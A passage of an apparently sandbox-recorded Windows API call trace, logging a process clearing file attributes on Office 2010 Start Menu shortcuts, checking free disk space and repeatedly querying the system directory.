lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.697] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Project 2010.lnk", dwFileAttributes=0x80) returned 1 [0139.700] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.707] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Publisher 2010.lnk", dwFileAttributes=0x80) returned 1 [0139.712] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.725] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft SharePoint Workspace 2010.lnk", dwFileAttributes=0x80) returned 1 [0139.728] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.733] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Visio 2010.lnk", dwFileAttributes=0x80) returned 1 [0139.736] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.741] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Word 2010.lnk", dwFileAttributes=0x80) returned 1 [0139.744] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.744] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.744] CoTaskMemFree (pv=0x4e1c10) [0139.748] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.758] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Digital Certificate for VBA Projects.lnk", dwFileAttributes=0x80) returned 1 [0139.760] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.766] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Clip Organizer.lnk", dwFileAttributes=0x80) returned 1 [0139.769] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.774] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Language Preferences.lnk", dwFileAttributes=0x80) returned 1 [0139.777] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.783] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office 2010 Upload Center.lnk", dwFileAttributes=0x80) returned 1 [0139.786] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.792] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Office Picture Manager.lnk", dwFileAttributes=0x80) returned 1 [0139.796] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0139.802] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Microsoft Office\\Microsoft Office 2010 Tools\\Microsoft Project Server 2010 Accounts.lnk", dwFileAttributes=0x80) returned 1 [0139.805] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.805] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.805] CoTaskMemFree (pv=0x4e1c10) [0139.808] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.814] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\SharePoint\\Microsoft SharePoint Workspace 2010.lnk", dwFileAttributes=0x80) returned 1 [0139.816] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.816] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.816] CoTaskMemFree (pv=0x4e1c10) [0139.817] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.817] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.817] CoTaskMemFree (pv=0x4e1c10) [0139.820] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.820] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.821] CoTaskMemFree (pv=0x4e1c10) [0139.821] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.821] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.821] CoTaskMemFree (pv=0x4e1c10) [0139.822] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.822] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.822] CoTaskMemFree (pv=0x4e1c10) [0139.823] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.823] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.823] CoTaskMemFree (pv=0x4e1c10) [0139.823] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.823] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.823] CoTaskMemFree (pv=0x4e1c10) [0139.824] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.824] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.824] CoTaskMemFree (pv=0x4e1c10) [0139.824] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.824] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.825] CoTaskMemFree (pv=0x4e1c10) [0139.825] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.825] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.826] CoTaskMemFree (pv=0x4e1c10) [0139.826] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.826] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.826] CoTaskMemFree (pv=0x4e1c10) [0139.827] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.827] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.827] CoTaskMemFree (pv=0x4e1c10) [0139.827] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.827] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.828] CoTaskMemFree (pv=0x4e1c10) [0139.828] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.828] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.828] CoTaskMemFree (pv=0x4e1c10) [0139.829] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.829] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.829] CoTaskMemFree (pv=0x4e1c10) [0139.829] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.829] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.829] CoTaskMemFree (pv=0x4e1c10) [0139.830] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.830] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.830] CoTaskMemFree (pv=0x4e1c10) [0139.830] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.831] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.831] CoTaskMemFree (pv=0x4e1c10) [0139.831] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.831] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.831] CoTaskMemFree (pv=0x4e1c10) [0139.832] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.832] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.832] CoTaskMemFree (pv=0x4e1c10) [0139.833] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.833] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.833] CoTaskMemFree (pv=0x4e1c10) [0139.833] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.833] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.833] CoTaskMemFree (pv=0x4e1c10) [0139.834] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.834] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.834] CoTaskMemFree (pv=0x4e1c10) [0139.838] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.838] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.838] CoTaskMemFree (pv=0x4e1c10) [0139.839] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.839] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.839] CoTaskMemFree (pv=0x4e1c10) [0139.840] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.840] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.840] CoTaskMemFree (pv=0x4e1c10) [0139.841] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.841] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.841] CoTaskMemFree (pv=0x4e1c10) [0139.842] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.842] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.842] CoTaskMemFree (pv=0x4e1c10) [0139.842] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.842] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.843] CoTaskMemFree (pv=0x4e1c10) [0139.843] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.843] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.843] CoTaskMemFree (pv=0x4e1c10) [0139.844] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.844] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.844] CoTaskMemFree (pv=0x4e1c10) [0139.846] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0139.857] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif", dwFileAttributes=0x80) returned 0 [0139.860] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.860] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.860] CoTaskMemFree (pv=0x4e1c10) [0139.862] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0139.918] SetFileAttributesW (lpFileName="C:\\ProgramData\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg", dwFileAttributes=0x80) returned 0 [0139.922] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.922] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.922] CoTaskMemFree (pv=0x4e1c10) [0139.922] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.922] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.923] CoTaskMemFree (pv=0x4e1c10) [0139.923] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.923] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.923] CoTaskMemFree (pv=0x4e1c10) [0139.929] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.929] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.930] CoTaskMemFree (pv=0x4e1c10) [0139.930] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.930] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.930] CoTaskMemFree (pv=0x4e1c10) [0139.931] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.931] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.932] CoTaskMemFree (pv=0x4e1c10) [0139.932] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.932] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.932] CoTaskMemFree (pv=0x4e1c10) [0139.937] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.937] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.937] CoTaskMemFree (pv=0x4e1c10) [0139.938] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.938] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.938] CoTaskMemFree (pv=0x4e1c10) [0139.939] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.939] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.939] CoTaskMemFree (pv=0x4e1c10) [0139.939] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.939] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.940] CoTaskMemFree (pv=0x4e1c10) [0139.940] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.940] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.940] CoTaskMemFree (pv=0x4e1c10) [0139.941] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.941] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.942] CoTaskMemFree (pv=0x4e1c10) [0139.942] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.942] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.942] CoTaskMemFree (pv=0x4e1c10) [0139.944] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.944] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.944] CoTaskMemFree (pv=0x4e1c10) [0139.945] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.945] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.945] CoTaskMemFree (pv=0x4e1c10) [0139.946] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.946] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.946] CoTaskMemFree (pv=0x4e1c10) [0139.947] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.947] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.947] CoTaskMemFree (pv=0x4e1c10) [0139.948] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.948] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.948] CoTaskMemFree (pv=0x4e1c10) [0139.948] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.948] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.949] CoTaskMemFree (pv=0x4e1c10) [0139.952] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.952] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.952] CoTaskMemFree (pv=0x4e1c10) [0139.952] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.952] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.953] CoTaskMemFree (pv=0x4e1c10) [0139.953] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.953] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.953] CoTaskMemFree (pv=0x4e1c10) [0139.954] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.954] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.955] CoTaskMemFree (pv=0x4e1c10) [0139.955] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.955] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.955] CoTaskMemFree (pv=0x4e1c10) [0139.956] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.956] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.956] CoTaskMemFree (pv=0x4e1c10) [0139.956] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.956] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.957] CoTaskMemFree (pv=0x4e1c10) [0139.958] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.958] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.958] CoTaskMemFree (pv=0x4e1c10) [0139.958] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.958] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.958] CoTaskMemFree (pv=0x4e1c10) [0139.959] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.959] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.959] CoTaskMemFree (pv=0x4e1c10) [0139.962] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.962] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.962] CoTaskMemFree (pv=0x4e1c10) [0139.963] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.963] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.963] CoTaskMemFree (pv=0x4e1c10) [0139.964] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.964] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.964] CoTaskMemFree (pv=0x4e1c10) [0139.964] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.964] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.965] CoTaskMemFree (pv=0x4e1c10) [0139.965] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.965] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.965] CoTaskMemFree (pv=0x4e1c10) [0139.966] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.966] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.966] CoTaskMemFree (pv=0x4e1c10) [0139.966] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.966] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.967] CoTaskMemFree (pv=0x4e1c10) [0139.967] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.967] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.967] CoTaskMemFree (pv=0x4e1c10) [0139.968] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.968] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.968] CoTaskMemFree (pv=0x4e1c10) [0139.969] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.969] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.969] CoTaskMemFree (pv=0x4e1c10) [0139.970] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.970] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.970] CoTaskMemFree (pv=0x4e1c10) [0139.971] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.972] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.972] CoTaskMemFree (pv=0x4e1c10) [0139.972] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.972] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.972] CoTaskMemFree (pv=0x4e1c10) [0139.973] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.974] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.974] CoTaskMemFree (pv=0x4e1c10) [0139.975] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.975] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.975] CoTaskMemFree (pv=0x4e1c10) [0139.976] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.976] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.976] CoTaskMemFree (pv=0x4e1c10) [0139.978] CoTaskMemAlloc (cb=0x20c) returned 0x4e1c10 [0139.978] GetSystemDirectoryW (in: lpBuffer=0x4e1c10, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0139.978] CoTaskMemFree (pv=0x4e1c10) [0139.978] CoTaskMemAlloc 